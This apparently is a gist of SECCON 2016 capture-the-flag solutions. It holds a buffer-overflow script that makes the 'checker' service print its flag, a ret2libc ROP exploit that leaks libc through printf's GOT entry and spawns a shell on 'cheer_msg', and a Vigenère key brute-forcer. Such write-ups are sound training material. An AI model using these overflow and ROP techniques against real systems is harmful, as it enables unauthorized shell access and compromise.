@moratorium08
Last active December 14, 2016 13:05
writeups
# coding:utf-8
from pwn import *
# Scripted pwntools session against the SECCON "checker" service.
# Everything below is a fixed sequence of prompt reads and line writes; the
# script never inspects the replies, it only echoes them.
r = remote("checker.pwn.seccon.jp", 14726)

# Filler length shared by every line sent at the ">> " prompt.
# NOTE(review): presumably the distance from the input buffer to the data
# being overwritten in one specific build of the target; confirm against the
# binary, since the value is meaningless for any other build.
base = 377

print(r.recvuntil("NAME : "))
r.sendline("nao")

# Five filler lines, each one byte shorter than the previous (base+6 .. base+2).
# NOTE(review): looks like each line's terminator is being used to clear one
# more byte past the buffer. That only works if the service reads a line of
# unbounded length into a fixed-size buffer; a bounded read would stop it.
for extra in (6, 5, 4, 3, 2):
    print(r.recvuntil(">> "))
    r.sendline("A" * (base + extra))

# Last line at this prompt: filler plus three raw bytes (0x6010c0 if they are
# read as a little-endian value; treat that reading as an assumption).
print(r.recvuntil(">> "))
r.sendline("A" * (base - 1) + "\xc0\x10\x60")

print(r.recvuntil(">> "))
r.sendline("yes")

# Oversized answer to the FLAG prompt, then echo the next two reply lines.
print(r.recvuntil("FLAG : "))
r.sendline("A" * 300)
for _ in range(2):
    print(r.recvline())
# coding:utf-8
from socket import *
import time
import struct
import sys
import time
from pwn import *
# Two-round pwntools session against the SECCON "cheer_msg" service.
host = "cheermsg.pwn.seccon.jp"
port = 30527
r = remote(host, port)

# Hard-coded addresses and offsets. The *_plt/*_got/main values are absolute
# addresses; system/binsh/printf_libc are added to or subtracted from
# libc_base below, so they act as offsets inside libc.
# NOTE(review): all of these are tied to one binary and one libc build; the
# fixed absolute addresses suggest the target is not position-independent
# (confirm against the binary).
binsh = 0x16084c
system = 0x00040310
printf_plt = 0x8048430
printf_got = 0x804a010
printf_libc = 0x0004d410
main = 0x080485ca


def _send_round(payload):
    """Answer one length/name prompt pair and read up to the echoed message.

    The length is always sent as "-150".
    NOTE(review): presumably the service uses this signed length to size a
    stack allocation without rejecting negative values; validating the length
    on the server side would close this path.
    """
    print(r.recvuntil("Message Length >> "))
    r.sendline("-150")
    print(r.recvuntil("Name >> "))
    r.sendline(payload)
    print(r.recvuntil("Message : \n"))


# Round 1: three packed words (printf@plt, main, printf@got).
# The four bytes read back are treated as printf's runtime address.
rop = "".join([p32(printf_plt), p32(main), p32(printf_got)])
_send_round(rop)
libc_base = u32(r.recv(4)) - printf_libc

# Round 2: system, a placeholder word (the original marks it "dummy"), then
# the "/bin/sh" string address, all rebased onto the computed libc_base.
rop = "".join([
    p32(libc_base + system),
    p32(libc_base + binsh),  # dummy
    p32(libc_base + binsh),
])
_send_round(rop)
r.interactive()
# coding:utf-8
import hashlib
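# Number of rows scanned by getval(); the table file is expected to hold at
# least this many lines.
length = 28

# Read the substitution square from the file "table" in the working
# directory. The context manager closes the handle right away instead of
# leaving that to garbage collection.
with open("table") as table_file:
    f = table_file.read().rstrip("\n").split("\n")

# One list of single characters per line of the file.
table = [list(row) for row in f]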
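def getval(key, cipher):
    """Look up the plaintext symbol for one key/ciphertext symbol pair.

    The column is chosen by finding ``key`` in the header row ``table[0]``;
    the first ``length`` rows of that column are then searched for
    ``cipher``, and the header symbol at the matching row index is returned.

    Raises:
        ValueError: if ``key`` is not in the header row, or ``cipher`` does
            not occur in the selected column. (Previously this surfaced as
            an UnboundLocalError on an unassigned local.)
    """
    header = table[0]

    col = None
    for idx, symbol in enumerate(header):
        if symbol == key:
            col = idx  # no break: the last match wins, as before
    if col is None:
        raise ValueError("key symbol %r is not in the table header" % (key,))

    row = None
    for idx in range(length):
        if table[idx][col] == cipher:
            row = idx  # no break: the last match wins, as before
    if row is None:
        raise ValueError(
            "cipher symbol %r does not occur in the column for key %r"
            % (cipher, key)
        )

    return header[row]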
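if __name__ == '__main__':
    from itertools import product

    def decrypt(key, text):
        """Decrypt ``text`` symbol by symbol with the aligned symbols of ``key``.

        Stops at the shorter of the two, which matches the original
        index-based loops (the key is never shorter than the text there,
        except for the first print, which is bounded by the known key).
        """
        return ''.join([getval(k, ch) for k, ch in zip(key, text)])

    s = "VIGENERE"            # known leading part of the key
    c = "LMIG}RPEDOEE"        # ciphertext, in four chunks
    c2 = "WKJIQIWKJWMN"
    c3 = "DTSR}TFVUFWY"
    c4 = "OCBAJBQ"
    hash_ = "f528a6ab914c1ecf856a1d93103948fe"  # MD5 of the expected plaintext

    # Plaintext of the first chunk as far as the known key part reaches.
    print(decrypt(s, c))

    # Try every 4-symbol completion of the key, in the same order as four
    # nested index loops (last position varies fastest). The bound comes from
    # the alphabet row itself rather than a repeated literal 28, so it cannot
    # drift from the table, and no comprehension index shadows a loop index.
    al = table[0]
    for combo in product(al, repeat=4):
        key = s + ''.join(combo)
        ret = ''.join([decrypt(key, chunk) for chunk in (c, c2, c3, c4)])
        # MD5 serves only as an equality check against the published digest.
        if hashlib.md5(ret.encode('utf-8')).hexdigest() == hash_:
            print(ret)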